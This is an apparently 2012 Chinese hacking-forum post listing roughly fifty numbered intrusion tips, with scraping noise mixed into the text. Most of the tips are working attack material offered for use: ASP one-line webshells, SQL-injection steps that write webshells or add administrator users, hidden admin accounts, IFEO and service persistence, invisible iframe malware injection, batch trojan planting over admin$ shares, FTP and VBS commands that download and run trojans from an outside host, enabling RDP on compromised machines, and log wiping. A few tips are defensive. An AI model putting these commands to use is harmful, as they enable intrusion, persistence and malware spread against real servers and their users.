找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2154|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
0 K8 n2 m7 Z- \! c1 y. Mcacls C:\windows\system32 /G hqw20:R  ~* ~; A3 C, }* u
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入) j7 Q9 ~2 ^1 N3 u5 g. j
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F3 V9 T: b& Z. w
) |) h  g& O7 D% l6 T
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。4 {, C# g" u) c0 O0 A- K- V
/ S1 h" ]$ F' D6 ?; Q# a
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
$ @0 e, _# X- S6 x3 l1 e8 Y/ d
6 k0 A8 |7 q0 q0 ^5 X( J4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号5 M! X, R( F5 v2 ^0 B

+ G# h; u( G" ~( A/ d4 G5、利用INF文件来修改注册表
. ]- M" s" d% z, [' o0 z" F[Version]' c3 ]9 w6 N  R/ t
Signature="$CHICAGO$"
6 M# a" F  K! [. J) ~[Defaultinstall]5 X3 K0 u  m$ Q- e% ~4 M
addREG=Ating
: ~! A/ A3 i! Q$ T0 X* S+ @4 b  n2 u' p[Ating]3 P: @  ]' G. M) M: Z, g/ y
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
7 p8 O3 j# @; x+ q以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
! q! v9 r; {3 R5 o7 hrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
3 `( E; J& Q( ]3 j6 V- K: ]( P* A* r其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU" ?  f4 M3 q+ C  n% t
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU1 q- c" k( C4 K6 G# l
HKEY_CURRENT_CONFIG 简写为 HKCC; ]: c  f0 w6 T4 E4 H# H
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值; |- T" q; d5 k$ g$ r& i* H7 E
"1"这里代表是写入或删除注册表键值中的具体数据0 l; |$ E7 {# m/ Z

( [, H  m; Z7 n7 R% o. f3 y$ c8 ?6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,# G# D) e- o5 |( |2 |
多了一步就是在防火墙里添加个端口,然后导出其键值
7 e6 h* i- s/ y! m8 p! K[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
8 i- l/ A! W& X$ y8 b% _8 E( X3 R( b; T& I2 C
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽* V7 M( x: O" [5 w$ E
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
' L6 q4 {' d+ F+ q5 U5 @
; Q9 |- T& d7 C8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
/ j. R' N( }; G9 y# I
! S6 a( r# {( c- W# t% D9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,) a( a' `+ D9 G: e# g8 H
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。& L( S! Q5 E( @$ W' R) {2 @

1 E9 t/ `; C6 u/ w" \10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”0 @1 U& F( S7 ^6 o3 |

2 q5 g1 r" I2 p9 \$ T: q6 ?. a! F11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,6 m" y4 a% P: R' }
用法:xsniff –pass –hide –log pass.txt' R9 s; |, D7 R9 R

( G5 |+ ?' h, u12、google搜索的艺术  ^/ Z. a5 M2 k) C; k
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”$ @% H5 v, Q2 _% C) ?
或“字符串的语法错误”可以找到很多sql注入漏洞。' T0 a. B$ V9 d+ @' _. b5 ^

) T$ I$ D7 i$ c; i7 ]9 L13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。' M: f, T/ Z) S- M+ x
* J# i! {+ x2 L, A( k  a& Z% O0 K
14、cmd中输入 nc –vv –l –p 19879 m( \) ^) a, F" m
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
) r6 O+ o: @3 E( d& A9 B  P6 C9 P" G
15、制作T++木马,先写个ating.hta文件,内容为2 j% a5 X- T) C9 j: D2 n) \
<script language="VBScript">) d2 z& p& p3 ?% Z! R* E
set wshshell=createobject ("wscript.shell" ): S, _0 P" @/ v5 {
a=wshshell.run("你马的名称",1): [- Z1 a7 N+ y" }7 \2 [
window.close* P$ D# U3 M. x, z. Z4 K' J
</script>/ ^7 x, f0 P" E7 e% q: n0 W
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
8 m# F( q' a, r& |1 ^+ a2 X- c0 C5 Y
9 S- Y8 Q, L6 s' A" }& O. ~16、搜索栏里输入% c5 G8 x1 d( Y. C# i7 Q
关键字%'and 1=1 and '%'='! x; E0 n' @9 x; d) a+ F
关键字%'and 1=2 and '%'='
7 E0 Y: S6 T+ [# g比较不同处 可以作为注入的特征字符3 k3 v2 R5 [6 K" {
( s7 O2 Y' Q" j1 d+ x4 K5 D
17、挂马代码<html>
* e/ H0 Z. g, K2 K( T( V<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>/ h# g" n3 d* \5 ]
</html>/ J  n9 }6 d' t/ s# N7 u" ]

5 p& A* o7 H) h* G+ r18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
9 i: D( F; E1 ~2 ~! ?net localgroup administrators还是可以看出Guest是管理员来。
8 P0 d  s: H6 z
/ @& Y. u& Z7 S+ K19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
' ^' K: g0 }; q2 G0 Z& V用法: 安装: instsrv.exe 服务名称 路径7 @1 G/ V& R% M0 p6 o+ M
卸载: instsrv.exe 服务名称 REMOVE- W3 T; O/ y4 R3 c% Q  @
# S  m( T5 Z, {! g4 X

1 ~# X9 z* N" Y) Z1 S7 O2 O. X21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
$ \. [3 m- i1 b) @& j, P* I" K8 g: l不能注入时要第一时间想到%5c暴库。
( i/ w2 d3 G4 c1 `
& f( S. Z) Y- w# l22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~, j- l4 H$ q, \+ v9 N
4 r6 I9 H$ x+ i- y6 I4 b
23、缺少xp_cmdshell时
. D" O  o% z- Y尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
4 j: \. o! O: s2 q8 \假如恢复不成功,可以尝试直接加用户(针对开3389的). M3 ]0 R& v; i+ E
declare @o int) A. x5 A( k' @- R5 \
exec sp_oacreate 'wscript.shell',@o out
# y  M' {, j$ T' Y/ D5 yexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
0 r+ [( _" Q/ a. I9 \
, T1 w% G4 c' d1 X, B+ F" _24.批量种植木马.bat3 Q3 m( j0 A3 ?3 y9 I9 G& s
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中* U# D7 b' X0 M5 _6 u7 ]& `
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间) i; {- Q5 Y9 ^+ Q$ e$ H
扫描地址.txt里每个主机名一行 用\\开头
1 H6 m+ a8 S! l4 F8 F2 F
$ Z+ s9 d" d# k  d25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
! W9 b% k6 G$ u" l- F' Y; U$ f4 ^0 a2 q+ z$ e
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
4 q8 B; K. H# ~3 I" U0 ]将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.3 a2 o8 u- l2 a8 `3 R" p8 x
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
  w7 q7 P7 m# w2 K) C1 @& @7 }7 _, F7 T0 m2 i+ `
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
% a5 }1 h/ K) }$ S1 y% r2 A# N然后用#clear logg和#clear line vty *删除日志
, }5 |9 c8 S' x$ R* E
: [% E' N( }+ d" P; w% q, ~28、电脑坏了省去重新安装系统的方法  q, k) \' B8 E+ r; r9 Q4 E# C
纯dos下执行,8 u# F. w! y8 a" o, I
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config; l6 w7 h$ S! L- P% {+ J
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
- K' E6 y7 l3 A1 V# @
8 k( d" E) J1 x2 k29、解决TCP/IP筛选 在注册表里有三处,分别是:/ C. S, y; E4 s+ Y. I
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
* y; H2 C/ t0 k0 V2 I  ?HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
( C9 |3 I3 U* w! X; i* KHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip0 I5 N7 N# e* c" a$ L
分别用
$ f: `2 J' y* u8 qregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 T" s% m2 K# X- U& i) u1 Y+ Z: Cregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip1 Q, t. Z1 e7 X* H+ ]9 {
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' d0 f8 i8 t- w# c, R/ y; X
命令来导出注册表项
1 H+ D' w0 D6 n. V) Q8 W; X然后把三个文件里的EnableSecurityFilters"=dword:00000001,
( {# j2 b' p5 \$ U改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
0 I- x9 `4 [5 e' d% Qregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
, Q* x- j6 F* t6 W( z
' Y% C* _) W& p% u, U; \2 u" @30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U6 Q6 a- a. E6 k) ^
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
' k/ Z0 J2 i; q
! I6 @) X% n5 o# [2 y# R( u31、全手工打造开3389工具
' U" ?2 u' k( d: S4 q+ N0 D* b0 z打开记事本,编辑内容如下:. W' P" O0 Y( Z( h/ D1 l& D
echo [Components] > c:\sql
: w. s# q9 ^% v! k! Vecho TSEnable = on >> c:\sql4 Q" d% ~. a+ ]3 ?0 c/ g9 K
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
( h  g+ w& W, z% I1 k  O编辑好后存为BAT文件,上传至肉鸡,执行1 |7 t/ N5 l6 b( d0 r

3 q  [2 ^0 d0 D* V& z" `9 ]32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马0 @8 Y9 }8 B- K

6 Y$ b0 O# Y! D6 O3 z33、让服务器重启
$ W7 ~0 t( @; E' J9 f写个bat死循环:, r- ?: [, U+ J+ h/ v  x: t, T$ \
@echo off
. c- `) N& ]: H* G  {8 w:loop1
6 n) p: v* d' s; gcls
6 |! h8 x8 m% t5 G6 W7 Rstart cmd.exe
5 K6 n* _$ c7 L  `: E2 m/ r- |3 m$ ~# Egoto loop1
- O) y; L2 o2 V( L; |+ I4 \$ ]2 \保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启- X7 P. ]. `  w2 H) X/ f

8 [  s) v: Q$ w2 U  y34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,/ N; ~7 i+ G  a4 q
@echo off; E9 y; _5 s) V* R8 t
date /t >c:/3389.txt* h7 G& r6 u, T; T& Q9 d) ~
time /t >>c:/3389.txt
4 |& i* l/ Q( z- @( P( P& Yattrib +s +h c:/3389.bat
0 f" _' N' N3 \( n1 g# F/ k5 Zattrib +s +h c:/3389.txt
1 W5 L6 I3 ]/ ]8 z; l; Nnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt6 V) i" o3 B; ^! t9 A
并保存为3389.bat! q2 v- @! ^* \+ ~2 X" g* s' [
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号. s8 K0 r- ]+ k3 Q

& W  s; _/ P7 t35、有时候提不了权限的话,试试这个命令,在命令行里输入:
' C3 Y4 g2 ^9 Ustart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
( N: h9 T9 q% A; R/ H% |输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。1 T  c- D1 ]5 c5 |* D5 O' Q4 H! u

- ~+ o$ f4 y1 j36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件* l; A& d6 l! @% O- b" ~! |
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
# Y7 c* t0 \0 o+ ~0 m  \echo 你的FTP账号 >>c:\1.bat //输入账号
' q1 Y$ q" i% i# w$ Z( c. D6 aecho 你的FTP密码 >>c:\1.bat //输入密码% D* p' Y9 X, S
echo bin >>c:\1.bat //登入( l, i' e! h. v6 D; q, Y: y, }! j# [
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
) R2 A5 v: \- E' F0 r0 m+ }echo bye >>c:\1.bat //退出
8 R# g# q2 D; O  L然后执行ftp -s:c:\1.bat即可
, e9 _2 t# j: o3 H8 t# g) L4 O( u$ X+ P
37、修改注册表开3389两法
6 e7 f$ e0 X0 S: U(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表) g" l0 n* Y2 C% }! p2 @
echo Windows Registry Editor Version 5.00 >>3389.reg/ U3 N7 r$ ]* l2 q: q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg4 \3 {, j1 _* e" t! Z3 [/ |; M
echo "Enabled"="0" >>3389.reg3 n8 ~6 w+ q9 @" E& R2 _
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
5 E- i" x4 V9 \. Q7 c% oNT\CurrentVersion\Winlogon] >>3389.reg' A& a) O* j1 {3 z: l
echo "ShutdownWithoutLogon"="0" >>3389.reg; b) j9 G4 R; \1 w
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
4 k- E0 V# y2 \/ n- x0 J' A>>3389.reg
8 f, n  p" Z2 T$ h' P+ i; \  {; fecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
; T; c; y! p2 [* y+ w& |echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
( R9 T5 \4 K) P2 i8 y4 ^6 S8 j+ C: O0 Q5 X>>3389.reg  @, t$ P' D; S' D0 X
echo "TSEnabled"=dword:00000001 >>3389.reg
8 Y$ a' w7 j6 \0 m( j; H4 Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg$ w" M: x0 C, j( n* J
echo "Start"=dword:00000002 >>3389.reg- v! l3 k4 B! h4 F4 v" [! b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]% m/ h9 p' k; D& ^& \& N
>>3389.reg  t3 Q9 T, K7 v
echo "Start"=dword:00000002 >>3389.reg
9 Z- ^% O& k7 K9 \2 k6 \2 x& Techo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg6 R: A, _# n( S% e! V
echo "Hotkey"="1" >>3389.reg
7 v9 b6 c" O9 }# U1 P! m; lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 V9 }8 |  l; b8 s( H+ cServer\Wds\rdpwd\Tds\tcp] >>3389.reg& ]& u6 ^; s/ f/ s
echo "PortNumber"=dword:00000D3D >>3389.reg
, }8 g5 ^0 g0 K4 v$ D; L. Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 b+ K. L) e4 g7 r2 B8 dServer\WinStations\RDP-Tcp] >>3389.reg. X6 C8 z6 n! z& |# p  @
echo "PortNumber"=dword:00000D3D >>3389.reg' i; r9 i- {% ^1 \$ i- a- B
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。, D; E1 c( h& `+ h; S8 ^
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
! j. U& E7 C2 D- `! v$ R& G, _因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效; C; g+ n0 |# |2 |* U2 F/ l; ~
(2)winxp和win2003终端开启
5 g6 [4 ~0 G) @! W9 Z用以下ECHO代码写一个REG文件:
4 b4 r* [& z9 T' Recho Windows Registry Editor Version 5.00>>3389.reg1 c2 N1 t: ^, U7 {9 u  G. @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal9 M- o% n9 ]% x4 W' B: H
Server]>>3389.reg; o) r* @5 D% n- j6 \/ v3 ]
echo "fDenyTSConnections"=dword:00000000>>3389.reg
4 x. B" O6 M3 I8 R7 k! h8 decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal5 K) m: ]$ X% {: }; |
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
' J1 v3 A1 {, T" h0 uecho "PortNumber"=dword:00000d3d>>3389.reg
! C, F3 `5 M, L/ Z4 zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal8 k' L/ @. O  |) H- K4 X
Server\WinStations\RDP-Tcp]>>3389.reg, i% A& ^+ J( ?& D  k
echo "PortNumber"=dword:00000d3d>>3389.reg
: I- J. M# T( J. T5 x然后regedit /s 3389.reg del 3389.reg" l8 |3 d+ S0 O; N, w/ j
XP下不论开终端还是改终端端口都不需重启
# r4 q& l8 b  a" y0 d" l2 O3 n" `) ]# N& t  s9 r% W- [+ K
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
1 H" z# D" P3 M" j7 R, o0 Y% U用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'. ~4 S$ ~3 l3 {! z
$ @6 o5 G. A6 n, Q) S) G' ?
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
2 f+ d  b' j) S6 _! p(1)数据库文件名应复杂并要有特殊字符) r) T* C+ E; K# _
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
" h; W% Z5 s: @6 \将conn.asp文档中的
- @- M) Q/ w  |4 p# I2 H! K" e- gDBPath = Server.MapPath("数据库.mdb")
7 K3 J$ h. s: t9 z- j6 c+ oconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath: f* S3 y4 [- _) b! j
* V7 i+ c5 x* p! B
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置) N. ]) q( V, T4 s6 h9 P( Z
(3)不放在WEB目录里4 Z- ^4 R3 ^% `9 M
  c0 b4 f  k/ Y
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉0 P& W% @1 h7 e; d- Y" t7 f) S
可以写两个bat文件; C  q6 K& N+ |$ r% ~
@echo off
* Y: F! m- |9 W' \( j3 l2 h9 R/ h@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
, K  ^6 S! Y' ]( M1 B& f@del c:\winnt\system32\query.exe. J% J# e* W& V* _3 a
@del %SYSTEMROOT%\system32\dllcache\query.exe
  T% N0 x( t4 d2 w9 i! T+ p@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
. O* F; Q  z  V. h5 {, T$ B0 L* r
@echo off  s( @' o5 O: `8 P0 ?* H
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
* m5 o  o; K" D1 f' `@del c:\winnt\system32\tsadmin.exe* P6 q) Q$ I3 O) b' B
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
  u: m6 q0 r. L: @# |, ]6 O% f; c# R) A" g
41、映射对方盘符
- R9 E! _; f1 \* }' i- otelnet到他的机器上,$ x$ n0 C$ c5 Q
net share 查看有没有默认共享 如果没有,那么就接着运行
* N8 f! A! I) |/ Y1 [net share c$=c:
! K( ~0 g) F3 S# |; M! S) {net share现在有c$
; t9 X! u( D' }4 G  B在自己的机器上运行7 S( q2 O7 c0 Y& m0 F
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
: F% Y- l: x4 H  U; F" d- _6 \' n7 M1 z# r
42、一些很有用的老知识& k# g9 n8 i7 Z+ U3 q& ]
type c:\boot.ini ( 查看系统版本 )" w1 F! J2 O3 W; R1 G9 [2 {
net start (查看已经启动的服务)) ~8 f  P/ b0 T' I) |& C
query user ( 查看当前终端连接 )6 b% R6 r- A4 O8 h4 F9 d  S
net user ( 查看当前用户 )  ?" L) t: S: f4 |% U- Y: u
net user 用户 密码/add ( 建立账号 )9 n) n" J. Y7 J& c
net localgroup administrators 用户 /add (提升某用户为管理员)
# V+ I7 w+ A' F) ^! l& l1 Mipconfig -all ( 查看IP什么的 )2 h" _# Z+ `! j6 u' M
netstat -an ( 查看当前网络状态 )0 P: k9 Q8 ^9 v" U
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)# u9 _0 b' I- l
克隆时Administrator对应1F4
' Z* b$ l& \* _' B7 [guest对应1F5! `# p; j* ^# f7 Z+ Q/ [- e
tsinternetuser对应3E8
" m2 [# G, g& ]4 {
; d' l5 M6 S% e( D, l6 C6 T8 s: C43、如果对方没开3389,但是装了Remote Administrator Service
! n5 M  O" F, q7 ]/ p4 ~用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
9 h1 Y/ N8 Y, J% L解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
3 x, y) T! d# @2 d! ?" X先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"1 C( W' Q) P3 m: a/ E
* _; h: S! S6 ~$ _! u
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
# C( \( {: |8 T9 P1 W* u本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)% a6 n$ y+ T) r  K3 c: G/ b% D+ ^4 S
- x& \& h% \; {
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
( S/ |4 \2 K& ^4 q+ hecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open; r  @: A" f/ K5 o' H7 F
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =6 M$ V. _4 {6 U- R0 B
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
9 F- L  q2 N  S& W0 `1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs9 f' [" V( G8 s; G8 ^3 V, A
(这是完整的一句话,其中没有换行符)6 q$ {9 v/ p0 A# U$ ]  v) k' ]
然后下载:
' ]" w8 `6 y2 K- ]6 mcscript down.vbs http://www.hack520.org/hack.exe hack.exe
7 w2 E( R7 _3 H: K9 W7 D0 X. ]+ {. i5 o
46、一句话木马成功依赖于两个条件:# B1 S) S) Z  H+ {
1、服务端没有禁止adodb.Stream或FSO组件
+ `  d7 v$ n( ^* Y$ }) s2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。) ]7 u) X* j) E
' {3 L' }" N' |0 z" ~9 Z
47、利用DB_OWNER权限进行手工备份一句话木马的代码:0 h0 Z' a) U! O) `3 o  F( M
;alter database utsz set RECOVERY FULL--
" r, ]! N% k$ u# N( t- A% Z1 S  Y;create table cmd (a image)--
! p4 N6 E7 A4 V) b, E2 I; m;backup log utsz to disk = 'D:\cmd' with init--) H' E# A; n3 V
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
! W9 t5 G+ N/ F  f7 O;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--: N$ C+ ~, Z+ C3 ~1 m* ^: i
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。! F7 O/ Z& n4 W, k2 {1 l' m
  J, q6 U9 U4 D. k  _6 D
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
0 f; E* L/ }  {: m9 E3 f: c7 I! m* A3 F6 B  W3 y7 @
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options) N3 m/ H" N* O8 D9 b6 v: {
所有会话用 'all'。
5 |  W& h% z8 T! @# {: J9 a7 i-s sessionid 列出会话的信息。
, F& A8 l0 [2 W$ m7 b-k sessionid 终止会话。3 e8 i$ P( b/ z6 I2 j* C
-m sessionid 发送消息到会话。
8 [5 A# j  c' [7 N7 l' w: r, S3 y. T! l
1 ^% x8 Z8 `/ ~config 配置 telnet 服务器参数。
4 Y) d# B4 d  N( K+ F
4 Q( m. b& a+ s  hcommon_options 为:, V! E; ?5 j: \
-u user 指定要使用其凭据的用户$ C6 V9 O5 B) C! f. H) |% w0 f
-p password 用户密码
; U6 B6 d& ^. j* z/ Q3 B, |  a0 W0 \: a
config_options 为:
0 z8 \0 ]. ~& H: S/ i1 Fdom = domain 设定用户的默认域
* Y6 _% i* W3 P" zctrlakeymap = yes|no 设定 ALT 键的映射
/ @6 Q7 p( Z1 I: P. N; Ktimeout = hh:mm:ss 设定空闲会话超时值# a* u. ?7 ~4 [* @& Z0 _' }
timeoutactive = yes|no 启用空闲会话。
9 b" h0 a& E+ [4 ]4 N! ]: omaxfail = attempts 设定断开前失败的登录企图数。
. D' F" T; z9 T# U8 A$ ]maxconn = connections 设定最大连接数。
! x9 k% E- C! M# cport = number 设定 telnet 端口。4 M; H( c, O; F
sec = [+/-]NTLM [+/-]passwd
# v8 M) ~6 \1 i; B: m设定身份验证机构: j( u% [1 u* m6 g( U8 L
fname = file 指定审计文件名。( K; X2 z% N7 k! J
fsize = size 指定审计文件的最大尺寸(MB)。' x* `7 B4 m. {
mode = console|stream 指定操作模式。
* O' v* C, p) |% Vauditlocation = eventlog|file|both3 ?1 ?& q6 \5 g: w2 H- o
指定记录地点
3 m. w# n" o3 g* U; @+ P( S4 Caudit = [+/-]user [+/-]fail [+/-]admin
* e' l; y5 [; v/ K+ u* u' s" x3 K3 N9 v# {
49、例如:在IE上访问:
$ u+ n$ a5 ]2 k" W& Zwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/, j  ^& x- A" }& G8 w; K
hack.txt里面的代码是:. l0 ?' ]3 f0 i
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">& D, b0 y' w7 }, ]# W& d% I
把这个hack.txt发到你空间就可以了!/ I$ G; v5 {7 W- p9 F
这个可以利用来做网马哦!+ [7 T. f' y6 z+ u" {

7 Q4 \* R0 g( Y" C" V50、autorun的病毒可以通过手动限制!! G: n; n( L$ t% A2 v$ |  y( {
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
* z+ n/ U  U4 y$ G4 O2,打开盘符用右键打开!切忌双击盘符~  Z; u2 |" k' j3 H
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!& p0 n0 ]3 W/ o
, v0 \& ]' D( y" E! \9 J1 v: N
51、log备份时的一句话木马:1 ]1 T4 D& h  e0 S: F9 }) R6 |
a).<%%25Execute(request("go"))%%25>! o' C5 i& T* X: j3 M+ I* g/ x& r
b).<%Execute(request("go"))%>
# |2 A( D: i  Q+ O8 c9 Oc).%><%execute request("go")%><%
& l) B& j' K. M/ B6 y$ Zd).<script language=VBScript runat=server>execute request("sb")</Script>6 Y( k' M2 C5 W
e).<%25Execute(request("l"))%25>
